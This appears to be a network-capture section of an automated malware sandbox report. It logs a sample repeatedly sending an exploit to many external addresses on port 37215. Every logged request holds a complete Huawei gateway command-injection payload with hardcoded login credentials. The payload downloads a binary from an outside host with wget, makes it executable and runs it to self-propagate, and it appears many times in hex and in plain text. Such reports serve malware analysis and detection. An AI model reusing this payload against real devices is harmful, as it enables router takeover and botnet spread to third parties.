                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1720192.168.2.1343024101.100.125.2937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.618017912 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1721192.168.2.133381641.209.119.9437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.618046045 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1722192.168.2.1359234137.144.163.6637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.618046999 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1723192.168.2.1339524201.152.114.22737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.618046999 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1724192.168.2.1341020197.180.237.7937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.618495941 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1725192.168.2.1334938197.216.172.7437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.618499994 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1726192.168.2.135278468.123.231.20737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.618530035 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1727192.168.2.1357302157.156.124.8037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.618540049 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1728192.168.2.1354124157.30.145.1937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.618540049 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1729192.168.2.1352294157.190.145.10537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.618562937 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 